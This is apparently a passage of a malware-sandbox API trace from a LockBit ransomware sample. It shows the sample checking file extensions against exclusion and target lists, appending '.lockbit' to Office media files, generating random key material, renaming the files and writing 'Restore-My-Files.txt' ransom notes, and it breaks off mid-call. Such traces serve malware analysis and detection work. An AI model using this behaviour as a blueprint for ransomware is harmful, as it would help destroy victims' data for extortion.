lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.026] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.026] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.026] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.026] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.027] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14844_.GIF") returned 1 [0206.027] lstrcmpiW (lpString1="ntldr", lpString2="BD14844_.GIF") returned 1 [0206.027] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14844_.GIF") returned 1 [0206.027] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14844_.GIF") returned 1 [0206.027] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14844_.GIF") returned -1 [0206.027] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14844_.GIF") returned 1 [0206.027] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14844_.GIF") returned 1 [0206.027] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.027] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF") returned=".GIF" [0206.027] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.027] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.027] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.027] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.028] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.028] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.028] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF.lockbit") returned 76 [0206.029] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14844_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0206.030] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.030] malloc (_Size=0x40068) returned 0x3ef0008 [0206.030] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=316) returned 1 [0206.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0206.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0206.031] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0206.032] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.032] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.032] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.045] free (_Block=0x1fa2ed8) [0206.045] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.045] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.045] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3e9a00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf3e9a00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14845_.GIF", cAlternateFileName="")) returned 1 [0206.046] lstrcmpiW (lpString1=".", lpString2="BD14845_.GIF") returned -1 [0206.046] lstrcmpiW (lpString1="..", lpString2="BD14845_.GIF") returned -1 [0206.046] PathFindExtensionW (pszPath="BD14845_.GIF") returned=".GIF" [0206.046] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.046] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.046] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.047] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.047] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.047] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.047] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14845_.GIF") returned 1 [0206.047] lstrcmpiW (lpString1="ntldr", lpString2="BD14845_.GIF") returned 1 [0206.047] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14845_.GIF") returned 1 [0206.047] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14845_.GIF") returned 1 [0206.047] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14845_.GIF") returned -1 [0206.047] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14845_.GIF") returned 1 [0206.047] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14845_.GIF") returned 1 [0206.047] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.047] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF") returned=".GIF" [0206.048] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.048] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.048] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.049] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.049] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.049] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.049] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.049] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.049] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF.lockbit") returned 76 [0206.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14845_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0206.050] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.050] malloc (_Size=0x40068) returned 0x3df0008 [0206.050] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=279) returned 1 [0206.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0206.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0206.051] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0206.052] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.052] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.052] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.053] free (_Block=0x1fa2ed8) [0206.053] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.053] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.054] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde300, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1ebde300, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14882_.GIF", cAlternateFileName="")) returned 1 [0206.054] lstrcmpiW (lpString1=".", lpString2="BD14882_.GIF") returned -1 [0206.054] lstrcmpiW (lpString1="..", lpString2="BD14882_.GIF") returned -1 [0206.054] PathFindExtensionW (pszPath="BD14882_.GIF") returned=".GIF" [0206.054] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.054] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.054] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.055] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.055] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.055] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.055] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.055] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.055] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14882_.GIF") returned 1 [0206.055] lstrcmpiW (lpString1="ntldr", lpString2="BD14882_.GIF") returned 1 [0206.055] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14882_.GIF") returned 1 [0206.055] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14882_.GIF") returned 1 [0206.056] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14882_.GIF") returned -1 [0206.056] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14882_.GIF") returned 1 [0206.056] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14882_.GIF") returned 1 [0206.056] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.056] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF") returned=".GIF" [0206.056] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.056] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.056] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.057] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.057] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.057] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.057] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.057] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF.lockbit") returned 76 [0206.057] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14882_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0206.057] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.058] malloc (_Size=0x40068) returned 0x1ff1e60 [0206.058] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=381) returned 1 [0206.058] LoadLibraryA 